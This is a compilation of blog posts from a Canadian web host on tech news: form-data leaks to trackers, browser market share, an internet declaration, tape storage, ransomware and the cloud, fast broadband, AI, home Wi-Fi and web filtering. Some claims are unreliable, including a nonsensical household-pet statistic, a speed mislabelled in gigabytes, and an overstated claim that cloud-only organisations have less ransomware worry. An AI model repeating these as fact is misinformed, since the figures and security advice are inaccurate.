3rd-Party Web Trackers Logging Pre-Submission Information Entered

Canadian Data Protection

Anyone and everyone is going to be extra mindful of what information is shared digitally these days, and even most kids are aware of the fact that you can’t be entirely at ease about what you type into submission fields and then press ‘Enter’. You need to be mindful of what you share, but it turns out you need to be the same way before you even press the enter button at all. Many people may think they’ve smartly avoided any potential problems by backspacing over something they’ve typed and were about to submit, but it turns out the damage may already be done.

We’ll get to what exactly is at issue here, but before we do we should make clear that ‘leaks’ don’t always end up being what they are on purpose. Many times there is information exposed not because someone is choosing to do so, but rather because the information is contained in location that doesn’t actually have the security protocols owners / users will think that it does. Truth of the matter it is nearly impossible to be airtight with this stuff 100% of the time.

Here at 4GoodHosting we’re like any other good Canadian web hosting provider in that we like to share information with our customers anytime we find example of it that we know will have real significance with them. This is one of those scenarios, as nearly everyone is going to be choosing to voluntarily provide information about themselves when asked to do so online. Any way you can be more in the know about dos and don’ts when it comes to this is going to be helpful, so here we are for this week.

Made Available

A recent study that looked into the top 100k ranking websites is indicating that many are leaking information you enter in the site forms to third-party trackers, and that this may be happening ever before you press submit. The data that is being leaked may include personal identifiers, email addresses, usernames, passwords, along with messages that were entered into forms but deleted and never actually submitted.

This type of data leak is sneaky because until now internet users would assume that the information they type on websites isn’t available unless they submit it. That IS true most of the time, but for almost 3% of all tested sites there is the possibility of once it’s typed out it’s already been made available and that’s the reality even if you don’t actually submit the info.

A crawler based on DuckDuckGo’s Tracker Radar Collector tool was what was used to monitor exfiltration activities, and the results do confirm that this is very much a possibility and there’s not much if anything that could be seen as tip-off for users to indicate to them when this risk is present and where information should ideally not be entered into the field at all.

Nearly 19k of Sites

The crawler was equipped with a pre-trained machine-learning classifier that detected email and password fields as wall as making access to those fields interceptable. Then the test of 2.8 million pages found on the top 100,000 highest ranking sites in the world, and then found that of those 100k 1,844 websites let trackers exfiltrate email addresses before submission when visited from Europe. That is not such a high percentage, but for the same ratio in America it’s an entirely different story.

When visiting those same websites from the US, there were a full 2,950 sites collecting information before submission and in addition researchers determined 52 websites to be collecting passwords in the same way. It should be mentioned that some of them did make changes and efforts to improve security after being made aware of the research findings and informed that they were leaking.

But the logical next question here is who is receiving the data? We know that website trackers serve to monitor visitor activity, derive data points related to preferences, log interactions, and for each user an ID is created and one that is – supposedly – anonymous. Trackers are used by the sites to give a more personalized online experience to their users, and the value for them is having advertisers serve targeted ads to their visitors with an eye to increasing monetary gains.

Keystroke Monitoring

The bulk of these 3rd-party trackers are using scripts that monitor for keystrokes when inside a form. When this happens they then save the content, and collect it even before the user has pressed that submit button. The outfall of this then becomes having data entered on forms logged but losing the anonymity of trackers to push up privacy and security risks big time.

There are not a lot of these trackers out there, and most of the ones that are in operation are known by name. 662 sites were found to have LiveRamp’s trackers, 383 had Taboola, and Adobe’s Bizible was running on 191 of them. Further, Verizon was collecting data from 255 sites. All of this is paired with the understanding that the problem stems from a small number of trackers that are prevalent on the web.

So what is a person or organization to do? The consensus is the best way to deal with this problem is to block all 3rd-party trackers using your browser’s internal blocker. A built-in blocker is standard for nearly all web browsers, and it is usually found in the privacy section of the settings menu.

Private email relay services are a smart choice to because they give users the capacity to generate pseudonymous email addresses. In the event someone does get their hands on it, identification won’t be possible. And for those who want to be maximum proactive there is a browser add-on named Leak Inspector and it monitors exfiltration events on any site and provides warnings to users when there is a need for them.

Edge Now Second to Only Chrome as Web Browser of Choice

We can go right ahead and assume that there are so many Mac users who opt to use Chrome as their browser rather than the Safari that their device came with. We say that with confidence because we’re one of them, and it is a fact that Google’s offering continues to be the de facto choice as a web browser for the majority of people all around the world. There’s plenty of reasons for that, although at the same time we will be like most people and say that both Safari and Firefox aren’t bad per se. Internet Explorer on the other hand is an entirely different story.

Now to be fair if IE hadn’t been left to wither on the vine that might not be the case, but the fact it was played a part in why the Edge browser has made the inroads into the market it has. But as always choice is a good thing and if anything it puts the pressure on the runner ups to get better to reclaim whatever user share they’ve lost. So competition joins choice as a good thing. This is one topic that everyone can relate too, and it’s been a topic of discussion in nearly every office here in North American and likely elsewhere around the globe.

Like any good Canadian web hosting provider we’re no different here at 4GoodHosting, and you can know that those of us around here have the same strong opinions about which web browser is best and why. Likely you have much the same going on around your places of productivity, so this is the topic for our blog entry this week.

Closed the Gap

February of this year had Microsoft Edge on the cusp of catching Safari with less than a half percentage point separating the 2 browsers in terms of popularity among desktop users. Estimates are now that Edge is used on 10.07% of desktop computers worldwide, and that is 0.46% ahead of Safari who has now dipped down to 9.61%.

Google Chrome is still far and away the top dog though, being the browser of choice for 66.58% of all desktop users. Mozilla’s Firefox isn’t doing nearly as well as either of them, currently with just 7.87% of the share. That’s quite the drop from the 9.18% share it had just a few months ago.

Edge’s lead on other browsers, however, needs to be quantified depending on location. If we are to look at just the US, Edge trails Safari by quite a bit with only 12.55% of market share as compared to Safari’s 17.1%. In contrast Edge long ago passed Safari on the other side of the pond, with 11.73% and 9.36%, respectively in Europe.

And for Firefox it’s not looking promising at all, despite it being what we consider a very functional browser that doesn’t really come up short in comparison to others if you look at it strictly from the performance angle. Yes, it doesn’t have the marketing clout of either Microsoft or Google and that means brand recognition won’t be the same.

Long Ago in January 2021

As the default Windows 11 browser, the popularity of Edge has gone up quite a bit. We talked about February of this year, but let’s go back one year + 1 month further even to the start of 2021. There were concrete signs that Edge would be passing Safari for 2nd place in user popularity, and at that time the estimate was that it is being used on 9.54% of desktops globally. But back in January 2021 Safari was in possession of a 10.38% market share, and so what we are seeing is a gradual decline in popularity over the last year plus.

Chrome continues to move forward with speed though, even if it’s not ‘pulling away’ at all. It has seen its user base increase ever so slightly over that time, but at the same time Firefox has been losing users since the beginning of the year. And that is true even though Firefox hasn’t been at rest at all and has made regular updates and improvements to their browser.

So perhaps Apple and Safari can take some consolation in the fact they’re holding on third place quite well, but the reality is they have lost 0.23% of market share since February. However, we should keep in mind that Apple has hinted that it may be making sweeping changes to the way Safari function in macOS 13 towards the end of 2022.

Different for Mobile

It’s a different story for mobile platforms, and that can be directly attributed to Microsoft’s lack of a mobile operating system since Windows Mobile was abandoned. In this same market analysis Edge doesn’t even crack the top 6 browsers for mobile, while Chrome has 62.87% of usage share and Safari on iPhones and iPads coming in at 25.35% for a comfortable second place. Samsung Internet comes 3rd with 4.9%.

Overall statistics for desktop and mobile – Chrome 64.36% , Safari 19.13%, Edge 4.07%, Firefox 3.41%, Samsung Internet 2.84%, and Opera 2.07%.

It is true that Safari for desktop has received complaints from users recently because of bugs, user experience, and with matters related to website compatibility. Apple’s Safari team responded to that by asking for feedback on improvements and to be fair it did lead to a radical redesign of its browser. May of them were rolled back before the final version was publicly released in September.

New ‘Declaration of the Future of the Internet’ Signed Onto by More than 60 Countries

Go back some 30 years and those of us who anywhere past adolescence by that time would be dumbfounded to learn just how life-changing this new ‘Internet’ thing would become, along with being impressed with dial-up modems in a way that would seem bizarre nowadays considering where that technology has gone in such a short time. As with anything there’s been growing pains with the Internet too, and like any influential and game-changing technology it has been used for ill in the same way it’s provided good for society.

It’s also become an integral internationally shared resource, and that goes beyond just the sphere of business. The inter connectivity of the modern world is increasingly dependent on the submarine cables laid across entire ocean floors so that the globe can be connected by the Internet, and here at 4GoodHosting we are like any good Canadian web hosting provider in that it’s something that is near and dear to our hearts given the nature of what we do for people and the service we provide.

This is in part connected to the need to safeguard the future of the Internet, as there are so many complexities to it that didn’t exist previously and no doubt there will be more of them in the future. This is why the recently-signed Declaration of the Future of the Internet is such a big deal and more than worthy of being the subject for this week’s blog entry here.

Protecting Democracy & More

One of the ways that the Internet has most notably been abused is to threat democratic institutions like the legitimacy of election results and the like, and there’s no doubt that there are anti-North American interest groups in other parts of the world that are using the Web as the means of infiltrating and being subversive withing democratic institutions. The belief is that if no efforts are made to nip this in the bud or counter it now then it may become too big to rein in in the future.

This is why there was such a push to get countries onboard for this declaration now, and it seems there was enough enthusiasm and resolve to see it through. The Declaration of the Future of the Internet is to strengthen democracy online as the countries that have agreed to its terms have promised they will not undermine elections by running online misinformation campaigns or illegally spying on people. At least this is according to the White House.

More specifically what the declaration does is commit to the promotion of safety and the equitable use of the internet, with countries signed on agreeing to refrain from imposing government-led shutdowns and also committing to providing both affordable and reliable internet services for their populous. This declaration isn’t legally binding, but countries signed on have been told that if they back out they will get a very disapproving finger wag from Sleepy Joe at the very least.

Bigger Picture Aim

What this declaration is more accurately aiming to do is have the principles set forth within it will serve as a reference for public policy makers, businesses, citizens and civil society organizations. The White House put out a fact sheet where it provided further insight on how the US and other partners will collaborate to safeguard the future of the internet, saying they and their partners will work together to promote this vision and its principles globally, but with respect for each other’s regulatory autonomy within our own jurisdictions. Also being in accordance with our respective domestic laws and international legal obligations.

60 and Counting

So far 60 countries have committed to the declaration and there is the possibility of more doing so in the next little while. Russia, China and India were the notable absents and while India is a bit of a surprise the other 2 are not considering the reasons they might have for interfering into democratic processes and utilizing the web within the most effective ways of making that happen. Google is among the US-based tech giants endorsing the declaration, and their assertion is that the private sector must also play an important role when furthering internet standards.

What is likely is that something similar will be required every couple of decades so moving forward, and particularly if the web is to make even deeper inroads into life beyond a shallower level. It certainly has shown it has the potential for that, and that potential is likely growing all the time.

Tape Storage’s Resurgence for Unstructured Data

Server room in datacenter. Hosting services.

It’s not necessarily devolution when you choose to go back to an outdated technology, although many people will be absolute in their thinking that it is. But there are plenty of instances where the way it used to be ends up working better, and often when new operating realities change the game. This can be true if we look at it from the perspective of data storage where companies are doing what everyone else is doing – that is, choosing to locate most of that data storage in the cloud. Now if we were to collectively lose our minds and revert back entirely to physical storage, that would be devolution.

Where we’re going with this is that some physical storage means are making a comeback, and for plenty good reasons. Tape storage for unstructured data is one example here that’s really at the forefront these days, and naturally anything related to data storage will be relatable for us here at 4GoodHosting or for any good Canadian web hosting provider. We’re always attuned to the need for data storage security, and it’s a priority for us in the same way it is for many of you.

So that is why we see tape storage’s ongoing resurgence as being at least somewhat newsworthy and we’re making it the topic for this week’s entry. Let’s get into it.

Obsolete? Not so Fast

The fact that a record 148 exabytes of tape was shipped last year definitely indicates that tape storage has not become obsolete at all. In fact, a recent report is showing that LTO tape saw an impressive 40% growth rate for 2021. The reason for this is many organizations are attempting to cut costs related to cloud storage when archiving their unstructured data. And while only 105EB of total tape capacity was shipped during the pandemic in 2020, the amount that was ordered for 2021 broke a new record.

What we’re seeing here is organizations returning to tape technology, seeking out storage solutions that have the promise of higher capacities, reliability, long term data archiving and stronger data protection measures that have what is needed to counter ever-changing and expanding cybersecurity risks.

Increasing prevalence and complexity of malware is a contributing factor too. Irreparable harm can come from an organization having its systems infected with malware and the potential for harm is nearly the same as when data is locked following a ransomware attack. It’s true there are many well-established ways a company can be proactive in defending against the latest cyberthreats, but at the same time tape storage prevents sensitive files and documents from being online to begin with.

Air Gap is Key

We’re also seeing many businesses and organizations turning to LTO tape technology for increased data protection in response to surging ransomware attacks. The key component in it that makes it superior and effective is an air-gap which denies cybercriminals the physical connectivity needed to access, encrypt, or delete data.

Also of significance in all of this is the 3-2-1-1 backup rule. You’ve likely never heard of that, so let’s lay out what it is. It means making at least three copies of data and storing them on 2 different storage mediums. And then with one storage location off site and another one offline. LTO-9 tape also makes it easier for businesses to store more data on a single tape because of its increased tape storage capacity that can be as high 45 terabytes when compressed.

As a last note promoting this type of storage for unstructured data, his medium also has the advantage of being backward compatible with LTO-8 cartridges in the event that any organization still needs to work with existing tape storage. It certainly is nice to have options, and sometime what is now old may be a better fit than what is newer and has replaced it.

Why Ransomware Tends to Avoid Cloud Environments

Malware concept with person using tablet computer, low key red and blue lit image and digital glitch effect

Ransomware attacks can be headaches of the highest order, and in many instances they have disastrous repercussions and that is to say nothing of the way those repercussions are paired with major expenses no matter how the problem ends up being resolved. When Japanese automaker giant Toyota had to shut down 14 factories across the country for one day, it was staggering to see just how much in the way of financial loss could come from just 24 hours of dealing with an attack.

Most businesses will be of a much smaller scale, but there’s also been plenty of instances of data being breached for businesses that no one will necessarily be familiar with. No matter what size of operation, if you have sensitive data stored in digital format – and who doesn’t nowadays – then you will want to make sure you have all the defences in place there and ready to do their job if and when it’s needed of them. Ransomware attacks are increasing; between 2019 and the end of 2021 they had risen well over 200% overall worldwide, and again it’s not always just the big fish being attacked.

Likely goes without saying that data management and data security are two aspects of operation that we can relate to here at 4GoodHosting, and that will almost certainly be true for any other quality Canadian web hosting provider who has the same solid operating principles for their web hosting business. Like most we’re also as enthusiastic and bullish about the ever-evolving potential for cloud computing, which leads us to our topic of discussion for this entry – why do ransomware attacks tend to look past cloud computing environments when weighing potential victims?

Franchised Ransomware

A recent advisory from the Cybersecurity and Infrastructure Security Agency (CISA), the US FBI, and the NSA reveals the latest trend is now ransomware as a service. Where gangs of malicious hackers essentially ‘franchise’ their ransomware tools and techniques and then make them available to less organized or less skilled hackers. This works out to many more attacks, despite some of them being not as sophisticated as others for the same reasons.

But the long and short of it is protecting against ransomware attacks must be part of any organization’s holistic cybersecurity strategy. And it turns out that is especially true if you’re still operating data center infrastructure and not cloud infrastructure. Hardening data centers and endpoints to protect against ransomware attacks is more and more needed every year, but it is true that cloud infrastructure faces a different kind of threat.

To be clear – if your organization is all in the cloud, ransomware can be less of a worry.

What, and Why?

First and foremost you shouldn’t be mistaking ransomware attacks as simply data breaches. A data breach only means data has been exposed, and it doesn’t even necessarily connote that data has been taken. Ransomware isn’t primarily ‘stealing’ either, and with it the aim is not to steal your data necessarily. Instead the aim is usually to take control of the systems that house or encrypt your data and prevent you from having access to it, unless you pay to have that access re-established for you.

The reason why ransomware attacks are not being carried out against cloud environments has everything to do with fundamental differences between cloud infrastructure and data center infrastructure.

For starters, any cloud environment is not simply a remote replica of its onsite data center and IT systems. Cloud computing is 100% software driven by APIs – application programming interfaces— which function as middlemen for the software and allowing different applications to have interactions with each other. The control plane is the API surface that configures and operates the cloud, and that control pane may be used to build a virtual server, modify a network route, and gain access to data in databases or snapshots of databases.

Key Resilience

Cloud platform providers have been working around the understanding that consumers who will pay for the technology and service are expecting data to be robust and resilient. Keep in mind replicating data in the cloud is both easy and cheap, and a well-architected cloud environment ensures multiple backups of data are done regularly. That’s the key means by which an attacker’s ability to use ransomware is impeded. Frequent takings of multiple copies of your data means they have less of the ability to lock you out. Should an attacker be able to encrypt your data and demand a ransom, you can take all their leverage away from them with simply reverting to the latest version of the data backed up prior to the encryption.

Effective security in the cloud is the result of good design and architecture rather than reactive intrusion detection and security analysis. Hackers have no other choice but to try to exploit cloud misconfigurations that enable them to operate against your cloud control plane APIs and steal your data. And to this point very few if any of them have had much success with that.

Automation is Best

Having cloud security protocols working automatically is best, as the number of cloud services keeps growing along with the number of deployments most of you will have. Add all the expanding resources and you can get why there is a need to not be manually monitoring for misconfigurations and enabling developers to write code that can be flexible for future revisions. Hardening your cloud security ‘posture’ is helpful too, with efforts to know your operating environment and its weak points on an ongoing basis as well as continuously surveying your cloud environment, to maintain situational awareness at all times.

Successful organizations evaluate all the time to know where they stand, where they’re going, and to quantify the progress they’ve made and are making towards addressing vulnerabilities and the security incidents that have or may result from them.

Toronto First to Get 3 Gbps Internet from Bell in Canada

Patience may well be a virtue, but few of us have much of it when we’re doing whatever is we’re doing online. We all remember those ads from years ago when broadband internet was new where they compared the previous super slow speeds as sucking a milkshake through the narrowest of straws. We’re a long way from that, and while the standard 1.5 gigabyte-per second speeds have been quite nice if there’s improvements to be made well then let’s get right to that.

Bell is one of the big players as a home broadband internet provider and they are the first to now be making 3 Gbps internet speeds available to Canadian consumers. We don’t need to talk about how this will appeal to people, and the needs for ever-better download and upload speeds is something that those of us here at 4GoodHosting will relate to in the same way any good Canadian web hosting provider would. We are tops for VPS virtual private server web hosting in Canada and we know that is sites like these with dynamic content that will be among the many that are better served this way.

People with sites hosted are going to want to have uptime guarantees for sure, but let’s not forget that these faster Internet speeds in Canada are also going to pair exceptionally well with the new 5G networks, and what is most noteworthy there is what that will do for Internet of Things applications and all that is set to do for the welfare of humanity and more.

Toronto is Canada’s most populous urban area, so it likely makes sense that the new 3-Gig internet speeds are going to be made available there first. Exciting news for anyone in Hogtown, so let’s use this week’s entry to look into this in greater detail.

Sub-30 Seconds

Downloading a 10GB file might not have necessarily been daunting in the past, but you would certainly understand you wouldn’t be viewing anything anytime soon. With this new type of high speed internet, it is a whole different story. Bell announced this new plan on April 6th, and as mentioned the fanfare expected for doubling existing Internet speeds to a full 3 Gbps is needing no explanation. That’s for both download and upload speeds, and we haven’t touched on what this will do for gaming either.

At peak performance, users can download a 10GB file in under 30 second and the plan is ideal for users like content creators who have ongoing needs to move data to and from the cloud, and in very large quantities. Downloading games is going to benefit in a big way too, and downloads of tens or even hundreds of gigabytes isn’t going to seem like such a big deal. Small businesses and home offices may see higher productivity levels resulting from the higher bandwidth to increase productivity.

Start in TO, but Expansion Soon

This is all part of making broadband and higher-speed Internet available to all, and Bell is only one of many providers who are taking part in the initiative. They are in the midst of their most aggressive fibre buildout ever in 2022, aiming to connect 900,000 more homes and businesses across much of Canada with direct fibre connections and making this type of upload and download speeds available to all of them.

Bell’s 2-year capital expenditure program has put almost $10 billion into this, and it is now in its second year where the focus is on an efficient and timely rollout of its broadband fibre, 5G and rural networks.

All of this stands to be fairly reasonably priced too – currently this new internet package from Bell is available to GTA area residents for $150 a month, and they are at this time offering the Home Hub 4000 router-modem with Wi-Fi 6 capabilities. If the highest of high-speed internet is music to your ears then get set to be as pleased as can be.

Human Side of Artificial Intelligence

Artificial intelligence making possible new computer technologies and businesses

If there has been any time in human history where technological advances in computing have come as fast and furious as they have recently, we’re not aware of it and likely you aren’t either. What comes with so much promise also comes with some level of trepidation for people, but that has always been the case with any type of game-changer advance that’s been seen in human society. A.I. is a great example where we wouldn’t even think about slowing the speed of change it is promising but at the same time most of us hope this doesn’t go sideways in any regard.

But one aspect of this where the potential positive ramifications absolutely must be encouraged is with making better use of data. This is something that any Canadian web hosting provider will be able to relate to, and here at 4GoodHosting we are no different. We understand the magnitude and potential for data management, but can also relate to a lot of shortcomings in how this data is understood and utilized properly.

Which leads us to the topic at hand here today. Advances in AI research have made it so that the use of computer algorithms to differentiate patterns from noise in data is entirely possible, and we now have open-source software and many data scientists streaming into the field. All of this leads to the belief that computer science, statistics, and information technology can lead to a successful AI project with useful outcomes. Teaching humans to think like AI will have value, but will have more of it is teaching AI to understand the value of humans.

Deep – and Deeper – Learning for Neural Networks

One of the most notable ways deep learning neural networks are being put to use is in healthcare, and specifically with more accurately predicting health outcomes. What we are seeing now is state-of-the-art AI algorithms for predicting health outcomes fairly accurately. This could be for whether a patient should be readmitted to the hospital following a surgery, or any number of other very significant decisions that can be better made by AI and its modeling as compared to what a doctor might advise.

While it is true that the deep learning models performed better than some standard clinical models, they still came up short in regards to logistic regression, a widely used statistical method. This suggests that AI learning does have limitations, but it seems the consensus those limitations are a) not significant enough to scale back deployment, and b) likely addressed in future advances with the technology.

Use of AI in healthcare is a great example of how the technology projects, so we’ll stick with it for now. There are indeed limitations, and to address them the early days of this roll out had the readers harmonizing all the data and feeding it into a deep learning algorithm before endeavouring to make sense of it. Some factors that may not be useful for clinical intervention weren’t included, and primarily because they can’t be changed.

The factors that were prioritized for incorporation into neural network architecture were the ones that would improve the performance and the interpretability of the resulting predictive models. Still, until recently there was less of a focus on how all of this would work when dealing with the human operation end of the equation, and that’s where the focus needs to be now.

Advantage to Human Side of AI

Human involvement with an AI project needs to start with a programmer or engineer formulating the question the AI is to address. Let’s say right off the bat that AI will not be able to master this anytime soon. It will require depth, breadth, and synthesis of knowledge of different kinds and AI simply isn’t there yet. Imaging what is missing or what is wrong from what is known is – at least for now – very difficult for modern AIs to do.

Humans are also needed for knowledge engineering. This part of it has been important in the AI field for decades and the current focus is on domain-specific knowledge in the right format to the AI. Reason being so that it doesn’t need to start from scratch when solving a problem. As powerful as AI can be, we should remember that humans have an ability to synthesize knowledge that far exceeds what any computer algorithm can do. That right there is the crux of why valuable human input and reciprocal learning is going to be absolutely essential if AI is going to do what we hope it will.

As AI moves ever forward in being a big part of our lives, it is important to remember that users and those who stand to benefit from it have a key role to play in the data science process attached to the development of it. Done right it will improve the results of an AI implementation and reduce the potential for harm or misuse.

Insufficient Wi-Fi Connectivity Dampening WFH Prospects for Many

Two years ago this month was the first time that many of us spend more than a handful of days working remotely from home, and as we’ve learned since then a whole lot of people have remarked how its done very positive things for their lives. At the same time a lot of employers have said they haven’t seen any dip in productivity so – why not? Granted a whole lot of us have returned to the office for at least a portion of the week, but if you are able to continue working from home then a strong and reliable Wi-Fi connection is going to be a must.

A report from Cisco that came out early this year has indicated that for a lot of people that lack of reliable internet connection is forcing them to reconsider the home office. There’s no getting around the fact it’s a deal breaker for most people if that can’t be counted on, although there are ways to improve your internet connection that may be doable here provided you aren’t too far out from a major city center. The problem there might be that people have relocated to these quieter locales to now find the internet connection just isn’t good enough.

Here at 4GoodHosting we’re like any Canadian web hosting provider in that we can certainly relate to how that has to be all important. There are many of our customers with websites offering creative services and the like and they are among the thousands of Canadians nationwide who are 100% reliant on their internet to be able to work from home.

So let’s look at everything this report had to say and perhaps get a look at how we’re maybe not entirely ready to have so many people working from home and demanding more than what can be provided when it comes to reliable Wi-Fi.

Broadband Indexing

The report is called Cisco’s Broadband Index, and it was a survey of 60,000 workers in 30 countries who provided feedback on their home broadband access, quality, and usage. It has indicated that today people value access to the internet more than ever and believe access to a fast, reliable connection, is universally a key to economic and societal growth.

Plus we now have hybrid-office and remote-work business models that have grown out of the COVID-19 pandemic where employees are relying heavily on the internet connections they’re able to access. Around 84% of survey respondents stated they are actively using broadband at home for longer than 4 hours a day. 75% of them said broadband services need significant upgrades to support the number of people now able to work from home and want to do that.

The challenge is these Internet connections are under much more strain now, and white collar workers were confined to their homes during the last two years are a big part of that strain to go along with all the streaming people of all sorts are doing these days. Here’s another consideration – 60% of survey respondents live in households where more than three people use the internet at the same time. Of those 60%, only 3% responded saying they have a pet that could put people’s lives in danger if it got out of the house.

Many Ready to Upgrade Service

Estimates are that nearly half of the world’s workforce now rely on their home internet to work or run a business, 43% of respondents stated their intention to upgrade their service in the next 12 months to stay in front of additional demands being placed on their broadband connection.

As mentioned there is also a large percentage of workers who are still at home for a significant portion of the work week. Some of them have said they’d rather look for a new job than lose the chance to work from home. So we can see that secure, high-quality, reliable internet is essential, especially if hybrid work models are to be continued because of not interrupting the effective working parts of a business.

Tackling Digital Divide

We may want to still be thankful about how good we do have it with connectivity considering 40% of the world remains unconnected. One thing industry experts agree on is that the inability to connect those 3-point something billion people over the next 10 years will likely increase the digital divide. Shortcomings with infrastructure is a significant factor in limited internet around the world. Rural and remote areas are more likely offline or insufficiently online, and this is usually due to costs being much higher than in urban areas.

The Broadband Index went further in providing data that puts even more of a light on concerns about the digital divide. 65% of respondents said access to affordable and reliable broadband will become a major issue, and particularly if connectivity becomes increasingly vital for job and educational opportunities. Another 58% of those surveyed said they were any number of factors blocking them from access to critical services such as online medical appointments, online education, social care, and utility services and all resulting in an unreliable broadband connection.

Stay Protected with Web Filtering and SafeDNS

It’s likely that no one who has business interests online will be unaware of the size of risk posed by cyberattacks these days. It seems like there’s a new high-profile, large scale one every month or so now and it shows that even though major corporations are spending plenty on cybersecurity it continues to not be enough depending on the nature of the threat and how advanced it may be. Another aspect of it that the average person may not grasp as readily is the fact these attacks often have repercussions that go far beyond just leaked data itself.

The one that maybe doesn’t get talked about enough is reputation, as if you’re big enough to be newsworthy when a cyber attack occurs then you’re big enough to have real interests in how your company is regarded in the big picture. There is definitely a risk to your reputation if a cyber attack of any magnitude occurs and you’re left needing to explain how you didn’t have the right level of security in place. Here at 4GoodHosting we’re like any reputable Canadian web hosting provider in that we fully relate to the need for security, and for businesses like ours that has everything to do with servers.

One newer solution that businesses can consider is web filtering and using the new SafeDNS service that promises to reinforce your web security efforts in a big way. That’s what we’ll look at here today and go into greater detail about why it is so highly recommended for anyone who would have a lot to lose if a cyber attack were able to make its way through their current defenses.

Thwarting Malware

Security has to be a foremost concern for businesses of all sizes, especially with more present risks of malware or others when the business is in the process of growing and expanding. And the number of these threats is growing all the time, and the sophistication of them means keeping your business protected online has never been as challenging as it is now. However, there are smart moves you can make.

Moves you should make, if we’re going to be plain about it. As we touched on briefly being hit by a cyberattack may not just damage data, it may have significant financial and reputational effects – as it did for Target, Equifax or SolarWinds to name just 3 of the high-profile cyber breach cases in recent years. It is estimated that over 80% of businesses have been victimized by ransomware, and some of them are reporting cyberattack attempts occurring up to 4 times a day. Let’s also consider the average ransomware demand for a US business. It’s well over $6 million.

Why Web Filtering

Web filtering may sound like an insignificant contribution when you consider the size and magnitude of the threats and the security landscape in it entirety, but it is a technology that can be very beneficial in making sure your business is never put at risk. This is where we’ll take the opportunity to introduce SafeDNS, which is aa comprehensive platform designed to protect organizations from online threats by means of its web filtering technology.

The primary way web filtering keeps your business safe is with monitoring of internet traffic for risks such as malware and phishing scams. It also has the ability to restrict access to unsuitable or dangerous websites, which makes it less likely an employee would create a breach unintentionally when visiting an external site where they simply don’t know any better about why it should be avoided. It is a cloud-based service entirely, and the appeal of that of course is that there is no bulky hardware taking up valuable office space, and it can be set up in very little time too.

Installation is not complicated in the slightest and there will be nothing in the way of deployments that will mean calls-out that can be expensive. But maybe the most noteworthy advantage it has is the fact the platform is run on powerful AI technology that incorporates machine learning and big data services to keep internet traffic safe. And if you need any other reinforcement of the fact that cyberthreats are a pressing concern, SafeDNS reports that overall it blocks some 33 million or so of them every day.

Other Pros

SafeDNS is also built on a network of 13 global data centers, and currently boasts 109 million sites in its database that are then sorted into 61 different subject content categories. The DNS-based filtering blocks unwanted sites before anyone has he chance to access them and create the immediate risk of the device being infected with one of the many types of malware.

What this does is allow for creation of customized policies for your workers, and you can also take advantage of traffic monitoring services and a detailed service dashboard that puts you very much on top of your new and improved cyber security defenses. Plus should your business grow your policies can expand too. There is no limit on the number of users and extensibility during filtering.

New 4-Way Consortium Coming Together for More Consistent Web Standard

Uniformity tends to be a good thing the majority of the time, and that can be said no matter what it is we’re talking about. The biggest reason that is true is because it allows people to have expectations about what they’re to experience, and to be able to rely on that experience in and out with every interaction. When it comes to web browsing you don’t even have to be a savvy individual to pick up on how not every page displays or behave the same way based on what browser you’re using.

Now of course that would be dependent on you using a different browser, so if you use only one exclusively then this may be something you don’t pick up on. But most of us will move between them for whatever reason, and when we do we notice that it’s rare for pages to be the same based on browser choice. This is something that has been the norm for well over 20 years now, and while it’s not a deal breaker to have this happen there would be something to say for a more consistent web standard.

Here at 4GoodHosting we are like any Canadian web hosting provider who can see the appeal of that based on simple visual comfort levels. Even if we are not aware of it there is a calming and soothing part of seeing what we expect to see each time, and we can also understand that if there is any level of new exploration required because a page is displaying / behaving differently then that is definitely undesirable too.

So the reason that we’re making this newsworthy is because there is a new 4-way effort underway to establish a more consistent and better web standard.

New Standard

Apple is working with browser developers Google, Microsoft, and Mozilla to make web design technologies more consistent, and consistent that way independent of what browser people are using. The problem here is that some browsers will have different built-in ways of handling web technologies. So in this sense there isn’t a standard of any sort for the web, and we then have developers, attempting to create consistent web interfaces across platforms, products, and elsewhere when a particular browser has the potential to undo all of that.

These 4 are making up the Interop 2022 alliance and the aim – as stated – is to ascertain how web standards are implemented by the different vendors. Some of this building on what came out of the Compat 2021 grouping.

The bigger picture aim of the project is to try to make it so that web applications based on these standards work and look the same no matter the devices, platforms, or operating systems. The hope then is that eventually web developers will be able to be more confident in the end-user experiences they deliver users being experienced in they way they intend them to be.

The further focus is on moving towards a future where making these areas interoperable is entirely possible, with constant updates to the relevant web standards for them, and extensive but quickly undertaken evaluation of that effectiveness also made possible.

Tests of 15 Web Platforms

15 web platform specifications have been tested so far, along with three capabilities that have not been fully developed yet. The tests are for Cascade Layers, Color Spaces, CSS color functions, Scrolling and more. We can be sure that developers, users, and platform operators alike will all welcome improvements in this area.

Another thing that needs to be pointed out is that this new consortium is digging deeper than what you might expect would be the case to simply find general interoperability. However, browser code isn’t where they are looking for the most part and instead what Interop 2022 is focusing on is the finite details in experience and design. Part of the reason this approach is being taken is because browser developers won’t want to unlock access to core functionality for competitors, and for obvious reason.

Some are saying that this is showcasing the limitations of WebKit in iOS development. The complaint is that developers of other browsers have no choice but to use WebKit rather than their own tech. IT’s fair to assume Apple will not approve this request. Sure, it may point out Safari’s limitations but it also could diminish hardware performance, security, and battery life.

Collective Criticisms

The goal of making the web as interoperable as it can be is an admirable one, and creating this reality shouldn’t take aways from any of these 4 big players with regards to their primary development interests as competitors among each other. There are some saying Apple hasn’t accelerated implementation of some web APIs that might help developers create web apps to compete against native iOS apps. This is very likely true, but we can almost certainly say the same about Google at the very least.

All in all, this is a commendable and very potentially beneficial step. A more uniform web standard stands to be a plus for all of us, from developers right down to everyday web browsers and simple site visitors.